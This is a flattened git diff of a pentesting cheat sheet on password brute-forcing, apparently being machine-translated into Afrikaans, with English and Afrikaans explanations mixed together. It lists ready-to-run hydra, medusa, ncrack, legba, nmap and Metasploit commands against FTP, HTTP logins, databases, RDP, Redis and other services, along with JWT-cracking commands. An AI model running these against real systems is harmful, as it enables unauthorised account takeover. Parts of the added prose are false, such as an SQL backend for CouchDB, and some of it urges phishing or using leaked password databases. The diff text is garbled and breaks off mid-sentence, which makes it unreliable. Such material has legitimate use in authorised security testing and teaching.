gevind word. Dit kan 'n tydrowende proses wees, maar dit kan suksesvol wees as die wagwoord nie sterk genoeg is nie. + +#### 4. SQL-injeksie + +As die CouchDB-databasis gebruik maak van 'n SQL-databasisagterkant, kan jy dalk 'n SQL-injeksie-aanval uitvoer om toegang te verkry. Hierdie aanval behels die invoeging van kwaadwillige SQL-kode in 'n invoerveld om die databasis te manipuleer. + +#### 5. Databasislekke + +Dit is belangrik om te kyk vir enige databasislekke wat dalk beskikbaar is op die internet. Jy kan soek na gelekte databasisse wat wagwoorde bevat wat ook in die CouchDB-databasis gebruik kan word. + +Onthou, dit is belangrik om etiese hackingpraktyke te volg en slegs toestemming te verkry om toegang tot 'n CouchDB-databasis te verkry. ```bash msf> use auxiliary/scanner/couchdb/couchdb_login hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get / ``` +### Docker Register -### Docker Registry +'n Docker Register is 'n stelsel wat gebruik word om Docker-beelde te stoor en te bestuur. Dit is 'n sentrale plek waar Docker-beelde geplaas en gedeel kan word. Dit is 'n nuttige hulpmiddel vir ontwikkelaars en operasionele spanne om Docker-beelde te organiseer en te bestuur. +'n Docker Register kan as 'n openbare register of 'n private register ingestel word. 'n Openbare register is toeganklik vir enigeen en word dikwels gebruik om openbare beelde te deel. 'n Privaat register is beperk tot 'n spesifieke organisasie of groep en word gebruik om privaat beelde binne die organisasie te stoor en te deel. + +'n Docker Register kan ook sekuriteitstoegangsbeheer implementeer om te verseker dat slegs geakkrediteerde gebruikers toegang tot die beelde het. Dit kan ook funksies bied soos beeldversiesbeheer, beeldsleutelwoorde en beeldmetadata. + +Die mees algemene Docker Register is die Docker Hub, wat 'n openbare register is wat deur Docker self bedryf word. Daar is egter ook ander opsies beskikbaar, soos die gebruik van 'n private register soos die Google Container Registry of die opstel van 'n eie private register met behulp van sagteware soos Docker Registry of Harbor. ``` hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/ ``` - ### Elasticsearch +Elasticsearch is 'n oopbron, gedistribueerde soekenjin wat gebruik maak van Apache Lucene om vinnige en skaalbare soektogte na gestruktureerde en ongestruktureerde data te bied. Dit is 'n baie gewilde keuse vir die indeksering en soektog van groot hoeveelhede data, soos loglêers, metodes, dokumente en meer. Elasticsearch bied 'n kragtige soektaal en 'n ryk stel funksies wat dit 'n waardevolle hulpmiddel maak vir die hantering van data-analise en soektogte in 'n verskeidenheid toepassings. ``` hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get / ``` - ### FTP +FTP (File Transfer Protocol) is 'n protokol wat gebruik word vir die oordrag van lêers tussen rekenaars op 'n netwerk. Dit is 'n algemene metode vir die oordrag van lêers tussen 'n kliënt en 'n bediener. FTP maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie en maak gebruik van 'n reeks opdragte om die oordrag van lêers te beheer. + +#### Brute Force-aanval op FTP + +'n Brute Force-aanval op FTP is 'n metode waar 'n aanvaller probeer om toegang tot 'n FTP-bedieners te verkry deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. Die aanvaller gebruik 'n program of skripsie om outomaties die kombinasies te probeer totdat die regte kombinasie gevind word. + +Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval op FTP uit te voer: + +1. Woordelys-aanval: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om te probeer om toegang tot die FTP-bedieners te verkry. Die aanvaller gebruik 'n program of skripsie om elke wagwoord in die woordelys te probeer totdat die regte wagwoord gevind word. + +2. Brute Force-aanval met behulp van 'n woordelys en regels: Hierdie metode behels die gebruik van 'n woordelys van wagwoorde, sowel as spesifieke reëls om die wagwoorde te verander. Byvoorbeeld, die aanvaller kan reëls soos die vervanging van letters met syfers of die toevoeging van spesiale karakters gebruik. Hierdie metode verhoog die aantal moontlike kombinasies wat probeer word. + +3. Brute Force-aanval met behulp van 'n aangepaste woordelys: Hierdie metode behels die gebruik van 'n aangepaste woordelys wat spesifiek is vir die teiken. Die aanvaller kan inligting soos gebruikersname, e-posadressse of enige ander relevante inligting insluit om die wagwoorde te raai. + +Dit is belangrik om te onthou dat 'n brute force-aanval op FTP 'n tydrowende proses kan wees, veral as die wagwoord sterk en lang is. Dit is ook belangrik om sterk wagwoorde te gebruik en om sekuriteitsmaatreëls soos tweeledige verifikasie te implementeer om die risiko van 'n suksesvolle brute force-aanval te verminder. ```bash hydra -l root -P passwords.txt [-t 32] ftp ncrack -p 21 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M ftp legba ftp --username admin --password wordlists/passwords.txt --target localhost:21 ``` - -### HTTP Generic Brute +### HTTP Generiese Brute #### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md) -### HTTP Basic Auth - +### HTTP Basiese Auth ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/ # Use https-get mode for https medusa -h -u -P -M http -m DIR:/path/to/auth -T 10 legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/ ``` - ### HTTP - NTLM +NTLM (New Technology LAN Manager) is an authentication protocol used in Windows environments. It is commonly used for HTTP authentication, allowing users to access web applications and services. + +#### Brute-Forcing NTLM Credentials + +To perform a brute-force attack on NTLM credentials, you can use tools like `Medusa` or `Hydra`. These tools allow you to automate the process of trying different username and password combinations until a valid set of credentials is found. + +Here is an example command using `Medusa` to brute-force NTLM credentials: + +```plaintext +medusa -h -u -P -M http -m AUTH:NTLM -T 10 +``` + +- ``: The IP address of the target machine. +- ``: A file containing a list of usernames to try. +- ``: A file containing a list of passwords to try. +- `-M http`: Specifies the protocol to use (HTTP). +- `-m AUTH:NTLM`: Specifies the authentication method to use (NTLM). +- `-T 10`: Specifies the number of threads to use (10 in this example). + +#### Protecting Against Brute-Force Attacks + +To protect against brute-force attacks on NTLM credentials, you can implement the following measures: + +1. Enforce strong password policies: Require users to choose complex passwords that include a combination of uppercase and lowercase letters, numbers, and special characters. Additionally, enforce password expiration and prevent password reuse. + +2. Implement account lockout policies: Set up account lockout thresholds to temporarily lock user accounts after a certain number of failed login attempts. This can help prevent brute-force attacks by slowing down the attacker's progress. + +3. Monitor and analyze logs: Regularly review logs for any suspicious activity, such as multiple failed login attempts from the same IP address. This can help identify and mitigate brute-force attacks in real-time. + +By implementing these measures, you can significantly reduce the risk of successful brute-force attacks on NTLM credentials. ```bash legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ ``` +### HTTP - Pos Vorm -### HTTP - Post Form +Brute force is 'n aanvalstegniek wat gebruik word om toegang te verkry tot 'n stelsel deur herhaaldelik verskillende wagwoorde of gebruikersname te probeer. Hierdie tegniek kan gebruik word om toegang te verkry tot 'n webwerf wat 'n posvorm gebruik om inligting te verifieer. +Die eerste stap in 'n brute force-aanval op 'n HTTP-posvorm is om die HTTP-aanvraag te analiseer wat deur die vorm gestuur word. Die aanvraag sal 'n spesifieke URL hê, gewoonlik die URL van die posvorm self. Dit sal ook 'n spesifieke metode hê, gewoonlik 'POST', wat aandui dat die vormdata gestuur moet word. + +Die volgende stap is om 'n lys van moontlike wagwoorde of gebruikersname te genereer. Hierdie lys kan bestaan uit algemene wagwoorde, woordelyswoorde of selfs persoonlike inligting oor die teiken. Dit is belangrik om 'n lys te hê wat so volledig as moontlik is, aangesien die sukses van die brute force-aanval afhang van die korrek raai van die regte wagwoord of gebruikersnaam. + +Die brute force-aanvaller sal dan elke wagwoord-gebruikersnaam-kombinasie van die lys probeer deur dit in die posvormdata in te voer en die HTTP-aanvraag te stuur. As die wagwoord-gebruikersnaam-kombinasie korrek is, sal die webwerf 'n suksesvolle verifikasie terugstuur, wat aandui dat die toegang verkry is. As die kombinasie ongeldig is, sal die webwerf 'n foutboodskap of 'n onsuksesvolle verifikasie terugstuur. + +Die brute force-aanval kan voortgaan totdat die regte wagwoord-gebruikersnaam-kombinasie gevind is, of totdat 'n bepaalde tydlimiet bereik is. Dit is belangrik om op te let dat brute force-aanvalle tydrowend kan wees en dat dit 'n groot hoeveelheid pogings kan neem voordat die regte kombinasie gevind word. + +Daar is verskeie tegnieke en hulpmiddels beskikbaar om brute force-aanvalle uit te voer. Dit sluit in outomatiese hulpmiddels wat wagwoorde en gebruikersname outomaties probeer, en hulpmiddels wat spesifiek ontwerp is vir die aanval van HTTP-posvorme. + +Dit is belangrik om te onthou dat brute force-aanvalle onwettig is en dat dit slegs gebruik moet word met toestemming van die eienaar van die teikenstelsel. ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V # Use https-post-form mode for https ``` +Vir http**s** moet jy verander van "http-post-form" na "**https-post-form**" -For http**s** you have to change from "http-post-form" to "**https-post-form"** - -### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle - +### **HTTP - CMS --** (W)ordpress, (J)oomla of (D)rupal of (M)oodle ```bash cmsmap -f W/J/D/M -u a -p a https://wordpress.com # Check also https://github.com/evilsocket/legba/wiki/HTTP ``` - ### IMAP +IMAP (Internet Message Access Protocol) is 'n protokol wat gebruik word om e-posboodskappe te ontvang en te stoor op 'n e-posbediener. Dit maak dit moontlik vir gebruikers om toegang tot hul e-posrekeninge te verkry en e-posboodskappe te lees vanaf enige toestel wat met die internet verbind is. + +IMAP ondersteun verskillende funksies, soos die sien van 'n lys van e-posboodskappe in 'n posbus, die lees van e-posboodskappe, die stuur van nuwe e-posboodskappe, die uitvee van e-posboodskappe en die skep van nuwe posbusse. Dit maak ook gebruik van 'n stelsel van mappen om e-posboodskappe te organiseer en te kategoriseer. + +'N Brute force-aanval op 'n IMAP-bediener behels die gebruik van 'n program of skripsie om verskeie kombinasies van gebruikersname en wagwoorde te probeer om toegang tot 'n e-posrekening te verkry. Hierdie aanvalsmetode kan gebruik word om swak wagwoorde te identifiseer en toegang tot 'n rekening te verkry sonder die korrekte legitimasie. + +Dit is belangrik om sterk wagwoorde te gebruik en tweestapsverifikasie in te stel om die risiko van 'n suksesvolle brute force-aanval te verminder. ```bash hydra -l USERNAME -P /path/to/passwords.txt -f imap -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V nmap -sV --script imap-brute -p legba imap --username user --password data/passwords.txt --target localhost:993 ``` - -### IRC - +IRC (Internet Relay Chat) is 'n kommunikasieprotokol wat gebruik word vir real-time gesprekke oor die internet. Dit maak gebruik van 'n klient-bedieners model, waar gebruikers 'n IRC-klient gebruik om met 'n IRC-bediener te verbind. IRC-kanale word gebruik om gesprekke te organiseer en te fasiliteer, en gebruikers kan boodskappe stuur en ontvang binne hierdie kanale. IRC word dikwels gebruik vir gemeenskapsgebaseerde gesprekke, soos in openbare IRC-kanale of in privaatgroepgesprekke. ```bash nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p ``` - ### ISCSI +iSCSI (Internet Small Computer System Interface) is 'n protokol wat gebruik word om SCSI-opdragte oor 'n IP-netwerk te stuur. Dit maak dit moontlik om 'n blokgebaseerde toegang tot stoorplek oor 'n netwerk te verkry. iSCSI maak gebruik van TCP/IP-protokolle om SCSI-opdragte te verpak en oor te dra oor 'n IP-netwerk. Dit bied 'n koste-effektiewe en maklik implementeerbare oplossing vir die koppel van stoorplekbronne oor lang afstande. ```bash nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 ``` - ### JWT +JWT (JSON Web Tokens) is 'n openbare standaard (RFC 7519) wat gebruik word vir die veilige oordrag van inligting tussen partye as 'n JSON-voorwerp. Dit word dikwels gebruik vir die verifikasie en outentisering van gebruikers in webtoepassings en API's. + +'n JWT bestaan uit drie dele: 'n header, 'n payload en 'n handtekening. Die header bevat inligting oor die tipe token en die gebruikte algoritme. Die payload bevat die nuttige inligting wat oorgedra word, soos gebruikersinligting of toegangsregte. Die handtekening word gebruik om die integriteit van die token te verseker en te verseker dat dit nie gewysig is nie. + +Brute force-aanvalle kan gebruik word om die geheime sleutel te agterhaal wat gebruik word om die JWT te onderteken. Dit behels die outomatiese poging van verskillende moontlike sleutels totdat die regte een gevind word. Hierdie aanval kan tydrowend wees, veral as die sleutel sterk en lang is. + +Om te voorkom dat JWT's deur brute force-aanvalle gekraak word, is dit belangrik om sterk en unieke sleutels te gebruik. Dit kan ook nuttig wees om maatreëls te implementeer soos beperkte pogings, waar die toepassing na 'n sekere aantal mislukte pogings tydelik blokkeer. ```bash #hashcat hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt @@ -261,37 +375,75 @@ python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w #https://github.com/lmammino/jwt-cracker jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6 ``` - ### LDAP +LDAP (Lightweight Directory Access Protocol) is 'n protokol wat gebruik word om toegang te verkry tot en te kommunikeer met 'n directory-diens. Dit word dikwels gebruik in netwerke om gebruikersinligting en -hulpbronne te organiseer en te versprei. LDAP-bruteforcing is 'n tegniek wat gebruik word om toegang te verkry tot 'n LDAP-diens deur verskeie gebruikersname en wagwoorde te probeer totdat 'n geldige kombinasie gevind word. Hierdie tegniek kan gebruik word om swakke wagwoordbeleide te identifiseer en om toegang te verkry tot beskermde hulpbronne. ```bash nmap --script ldap-brute -p 389 legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match ``` - ### MQTT +MQTT (Message Queuing Telemetry Transport) is 'n ligewig, eenvoudige en betroubare protokol wat gebruik word vir die uitruil van boodskappe tussen toestelle. Dit is ontwerp vir die effektiewe kommunikasie tussen toestelle in 'n netwerk met beperkte hulpbronne, soos sensore en aktuators in die Internet of Things (IoT)-omgewing. + +MQTT maak gebruik van 'n publish-subscribe-model, waar toestelle boodskappe kan publiseer en inteken op spesifieke onderwerpe. Die protokol maak gebruik van 'n TCP/IP-verbinding en maak gebruik van minimale bandwydte en hulpbronverbruik. Dit maak dit ideaal vir toepassings waar energiebesparing en netwerkbeperkings belangrik is. + +Die veiligheid van MQTT kan verbeter word deur gebruik te maak van versleuteling en outentisering. Dit kan ook blootstelling aan aanvalle soos brute krag-aanvalle voorkom. Brute krag-aanvalle is 'n tegniek waar 'n aanvaller probeer om toegang te verkry tot 'n stelsel deur alle moontlike kombinasies van wagwoorde of sleutels te probeer. + +Om 'n brute krag-aanval teen MQTT te voorkom, kan maatreëls soos die gebruik van sterk wagwoorde, die beperking van die aantal foute pogings en die gebruik van outentiseringsmetodes soos TLS/SSL geïmplementeer word. Dit is ook belangrik om die MQTT-bediener op te dateer met die nuutste veiligheidsopdaterings om bekende kwesbaarhede te voorkom. + +As 'n hacker is dit belangrik om bewus te wees van die moontlikheid van brute krag-aanvalle teen MQTT en om sekuriteitsmaatreëls te implementeer om die risiko te verminder. ``` ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v -legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt +legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt ``` - ### Mongo +#### Brute Force + +Brute force is a common technique used to gain unauthorized access to a MongoDB database. It involves systematically trying all possible combinations of usernames and passwords until the correct credentials are found. + +To perform a brute force attack on a MongoDB database, you can use tools like Hydra or Medusa. These tools allow you to automate the process of trying different combinations of usernames and passwords. + +Before attempting a brute force attack, it is important to gather information about the target MongoDB database. This includes identifying the MongoDB version, the authentication mechanism used, and any default usernames or passwords that may be present. + +Once you have gathered this information, you can start the brute force attack by specifying the target MongoDB server, the list of usernames to try, and the list of passwords to try. The tool will then systematically try each combination until it finds the correct credentials. + +To increase the chances of success, it is recommended to use a large wordlist for usernames and passwords. These wordlists can be obtained from various sources, such as leaked databases or password cracking forums. + +It is important to note that brute forcing a MongoDB database is illegal and unethical unless you have explicit permission from the owner to perform the attack. Always ensure that you are conducting any hacking activities within the boundaries of the law and with proper authorization. ```bash nmap -sV --script mongodb-brute -n -p 27017 use auxiliary/scanner/mongodb/mongodb_login legba mongodb --target localhost:27017 --username root --password data/passwords.txt ``` - ### MSSQL +MSSQL, of Microsoft SQL Server, is 'n relationele databasisbestuurstelsel wat deur Microsoft ontwikkel is. Dit word algemeen gebruik vir die stoor en bestuur van data in besigheidsomgewings. + +#### Brute Force-aanvalle teen MSSQL + +'n Brute Force-aanval teen MSSQL behels die poging om toegang te verkry tot 'n MSSQL-databasis deur verskeie moontlike kombinasies van gebruikersname en wagwoorde te probeer. Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval teen MSSQL uit te voer: + +1. **Woordelys-aanval**: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om toegang te verkry tot 'n MSSQL-databasis. Die aanvaller sal elke wagwoord in die woordelys probeer totdat 'n suksesvolle trefslag bereik word. + +2. **Brute Force-aanval met aangepaste wagwoordlys**: In hierdie geval sal die aanvaller 'n aangepaste wagwoordlys gebruik wat spesifiek ontwerp is vir die doelwit MSSQL-databasis. Hierdie wagwoordlys kan bestaan uit kombinasies van algemene wagwoorde, gebruikersname, en ander relevante inligting. + +3. **Hybride aanval**: 'n Hybride aanval is 'n kombinasie van 'n woordelys-aanval en 'n brute force-aanval met aangepaste wagwoordlys. Dit behels die gebruik van 'n woordelys, gevolg deur die gebruik van aangepaste wagwoorde om toegang te verkry tot die MSSQL-databasis. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat die MSSQL-databasis behoorlik beveilig is teen brute force-aanvalle. ```bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433 ``` - ### MySQL +MySQL is 'n open-source relationele databasisbestuurstelsel wat gebruik word om data te stoor en te bestuur. Dit is baie gewild in die webontwikkelingsgemeenskap en word dikwels gebruik in kombinasie met PHP om dinamiese webtoepassings te bou. + +MySQL maak gebruik van 'n gebruikersnaam en wagwoord om toegang tot die databasis te beperk. 'n Brute force-aanval is 'n tegniek wat gebruik word om toegang tot 'n MySQL-databasis te verkry deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. Hierdie aanval is baie tydrowend, maar kan suksesvol wees as die regte kombinasie gevind word. + +Daar is verskeie hulpmiddels en tegnieke beskikbaar om 'n brute force-aanval op 'n MySQL-databasis uit te voer. Een van die gewildste hulpmiddels is 'Hydra', wat 'n aanval kan uitvoer deur verskeie wagwoorde te probeer vir 'n gegewe gebruikersnaam. Dit kan ook gebruik word om 'n woordelys-aanval uit te voer, waar dit 'n lys van moontlike wagwoorde deurloop om toegang te verkry. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat die MySQL-databasis korrek geïnstalleer en gekonfigureer is om die risiko van 'n brute force-aanval te verminder. Dit sluit in die gebruik van lang en komplekse wagwoorde, die beperking van toegang tot die databasis, en die monitering van verdagte aktiwiteit. ```bash # hydra hydra -L usernames.txt -P pass.txt mysql @@ -305,9 +457,19 @@ medusa -h -u -P <-f | to stop medusa on fir #Legba legba mysql --username root --password wordlists/passwords.txt --target localhost:3306 ``` - ### OracleSQL +Brute force is a technique used to crack passwords or gain unauthorized access to systems by systematically trying all possible combinations of passwords until the correct one is found. In the context of OracleSQL, brute force attacks can be used to guess the passwords of Oracle database users. + +To perform a brute force attack on an Oracle database, you can use tools like Hydra or Medusa. These tools allow you to automate the process of trying different passwords against a target Oracle database. + +Before attempting a brute force attack, it is important to gather information about the target Oracle database, such as the username and the Oracle SID (System Identifier). This information can be obtained through reconnaissance techniques like port scanning or banner grabbing. + +Once you have the necessary information, you can start the brute force attack by specifying the target Oracle database, the username, and a password list. The tools will then systematically try each password in the list until the correct one is found or all passwords have been exhausted. + +To increase the chances of success, it is recommended to use a large and diverse password list. This can include common passwords, dictionary words, and variations of known passwords. Additionally, you can also use password cracking techniques like hybrid attacks, which combine dictionary words with common patterns or modifications. + +It is important to note that brute force attacks can be time-consuming and resource-intensive. They can also be detected by intrusion detection systems or trigger account lockouts if too many failed login attempts are made. Therefore, it is crucial to use caution and obtain proper authorization before attempting any brute force attacks. ```bash patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 @@ -331,21 +493,21 @@ nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt ``` - -In order to use **oracle\_login** with **patator** you need to **install**: - +Om **oracle\_login** met **patator** te gebruik, moet jy dit **installeer**: ```bash pip3 install cx_Oracle --upgrade ``` - -[Offline OracleSQL hash bruteforce](../network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**): - +[Aflynser OracleSQL-hash bruteforce](../network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**weergawes 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** en **11.2.0.3**): ```bash - nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 +nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 ``` - ### POP +POP (Post Office Protocol) is 'n protokol wat gebruik word om e-pos van 'n e-posbediener af te haal en te lees. Dit is 'n algemene metode vir toegang tot e-posrekeninge en word dikwels gebruik deur e-poskliënte soos Outlook en Thunderbird. + +Brute force-aanvalle kan gebruik word om POP-wagwoorde te kraak deur verskillende kombinasies van gebruikersname en wagwoorde te probeer totdat die regte kombinasie gevind word. Dit kan gedoen word deur 'n woordelys van algemene wagwoorde te gebruik of deur 'n woordelys te skep wat spesifiek is vir die teikengebruiker. + +Dit is belangrik om te onthou dat brute force-aanvalle tydrowend kan wees en dat daar 'n risiko is om opgespoor te word. Dit is dus raadsaam om ander metodes, soos sosiale ingenieurswese of phising, te oorweeg voordat brute force-aanvalle gebruik word. ```bash hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V @@ -356,9 +518,33 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar # SSL legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl ``` - ### PostgreSQL +PostgreSQL is 'n open source objek-relasionele databasisbestuurstelsel (ORDBMS) wat bekend staan ​​om sy betroubaarheid, skaalbaarheid en uitgebreide funksieset. Dit word dikwels gebruik in webtoepassings, data-analise en geografiese inligtingstelsels. + +#### Brute Force-aanvalle op PostgreSQL + +'n Brute Force-aanval op PostgreSQL behels die poging om toegang te verkry tot 'n PostgreSQL-databasis deur herhaaldelik verskillende wagwoorde te probeer totdat die regte een gevind word. Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval op PostgreSQL uit te voer: + +1. **Woordelysgebaseerde aanval**: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om toegang te probeer verkry. Dit is 'n effektiewe metode as die regte wagwoord in die woordelys voorkom. + +2. **Brute Force-aanval met aangepaste wagwoordlys**: Hierdie metode behels die gebruik van 'n aangepaste wagwoordlys wat spesifiek vir die teiken PostgreSQL-databasis ontwikkel is. Dit kan wagwoorde insluit wat verband hou met die teikenorganisasie of gebruiker. + +3. **Brute Force-aanval met willekeurige wagwoorde**: Hierdie metode behels die gebruik van 'n program wat willekeurige wagwoorde genereer en probeer om toegang te verkry deur elke moontlike kombinasie te probeer. Dit is 'n tydrowende metode, maar kan suksesvol wees as die regte wagwoord kort genoeg is. + +#### Voorkoming van Brute Force-aanvalle op PostgreSQL + +Om brute force-aanvalle op PostgreSQL te voorkom, kan die volgende maatreëls geneem word: + +1. **Sterk wagwoordbeleid**: Implementeer 'n sterk wagwoordbeleid wat gebruikers dwing om lang en komplekse wagwoorde te gebruik. Dit sal die tyd wat nodig is om 'n wagwoord te kraak, aansienlik verhoog. + +2. **Tweefaktor-verifikasie**: Implementeer tweefaktor-verifikasie om 'n ekstra laag sekuriteit toe te voeg. Dit vereis dat gebruikers 'n tweede vorm van verifikasie, soos 'n eenmalige wagwoord of biometriese inligting, voorsien voordat hulle toegang tot die databasis verkry. + +3. **Beperkings op mislukte aanmeldpogings**: Stel beperkings in vir die aantal mislukte aanmeldpogings wat 'n gebruiker kan hê voordat hulle tydelik geblokkeer word. Dit sal die effektiwiteit van 'n brute force-aanval verminder. + +4. **Monitor vir verdagte aktiwiteit**: Monitor die databasis vir enige verdagte aktiwiteit, soos 'n ongewoon groot aantal aanmeldpogings. Dit kan dui op 'n brute force-aanval en kan vinnige reaksie en herstel moontlik maak. + +Deur hierdie maatreëls te implementeer, kan die risiko van 'n suksesvolle brute force-aanval op PostgreSQL aansienlik verminder word. ```bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres @@ -368,109 +554,235 @@ use auxiliary/scanner/postgres/postgres_login nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432 ``` - ### PPTP -You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) - +Jy kan die `.deb` pakkie aflaai om te installeer vanaf [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) ```bash sudo dpkg -i thc-pptp-bruter*.deb #Install the package cat rockyou.txt | thc-pptp-bruter –u ``` - ### RDP +RDP (Remote Desktop Protocol) is 'n protokol wat gebruik word om 'n gebruiker toe te laat om 'n rekenaarstelsel vanaf 'n afstand te beheer. Dit word dikwels gebruik om toegang tot 'n afgeleë rekenaar te verkry en dit te bestuur asof jy fisiek voor die rekenaar sit. + +#### Brute Force-aanvalle teen RDP + +'n Brute Force-aanval teen RDP behels die poging om die regte gebruikersnaam en wagwoord te raai deur verskeie kombinasies te probeer. Dit kan gedoen word deur 'n woordelys van algemene wagwoorde te gebruik of deur alle moontlike kombinasies van karakters te probeer. + +Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval teen RDP uit te voer: + +1. Woordelys-aanval: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om te probeer om die regte wagwoord te raai. Dit is 'n vinnige en eenvoudige metode, maar dit is afhanklik van die wagwoord wat gebruik word. + +2. Woordeboek-aanval: Hierdie metode behels die gebruik van 'n woordeboek van algemene woorde en frases om te probeer om die regte wagwoord te raai. Dit is 'n meer uitgebreide metode as 'n woordelys-aanval, maar dit kan meer tyd neem om die regte wagwoord te vind. + +3. Brute Force-aanval met alle moontlike kombinasies: Hierdie metode behels die probeer van alle moontlike kombinasies van karakters om die regte wagwoord te vind. Dit is 'n baie tydrowende metode, maar dit kan die regte wagwoord vind as dit korrek geïmplementeer word. + +Dit is belangrik om te onthou dat die uitvoering van 'n brute force-aanval teen RDP onwettig is sonder die toestemming van die eienaar van die rekenaarstelsel. Dit word aanbeveel om slegs hierdie tegniek te gebruik vir wettige doeleindes, soos om die veiligheid van 'n rekenaarstelsel te toets of om toestemming te verkry om 'n rekenaarstelsel te toets. ```bash ncrack -vv --user -P pwds.txt rdp:// hydra -V -f -L -P rdp:// legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon] ``` - ### Redis +Redis is 'n in-memory data store wat gebruik word vir die stoor en ophaling van data. Dit bied 'n vinnige en effektiewe manier om data te hanteer deur middel van sleutel-waarde pare. Redis ondersteun verskillende datastrukture soos strings, lyste, stelle, kaarte en nog baie meer. + +#### Brute Force-aanvalle teen Redis + +'n Brute force-aanval teen Redis behels die poging om toegang te verkry tot 'n Redis-stelsel deur middel van die uitvoering van 'n groot aantal moontlike kombinasies van gebruikersname en wagwoorde. Hierdie aanval is gebaseer op die feit dat baie gebruikers swak of maklik te raai wagwoorde gebruik. + +Om 'n brute force-aanval teen Redis uit te voer, kan 'n hacker 'n gereedskap soos Hydra of Medusa gebruik. Hierdie gereedskap maak dit moontlik om 'n groot aantal pogings in 'n kort tydperk uit te voer deur gebruik te maak van 'n woordelys van potensiële wagwoorde. + +Om 'n brute force-aanval teen Redis te voorkom, is dit belangrik om sterk en unieke wagwoorde te gebruik. Dit kan ook nuttig wees om 'n stelsel te implementeer wat verdagte pogings om toegang te verkry tot die Redis-stelsel opspoor en blokkeer. ```bash msf> use auxiliary/scanner/redis/redis_login nmap --script redis-brute -p 6379 hydra –P /path/pass.txt redis://: # 6379 is the default legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl] ``` - ### Rexec +Rexec is 'n protokol wat gebruik word om op afstand uitvoerbare programme op 'n bediener uit te voer. Dit maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie. Rexec is 'n potensiële 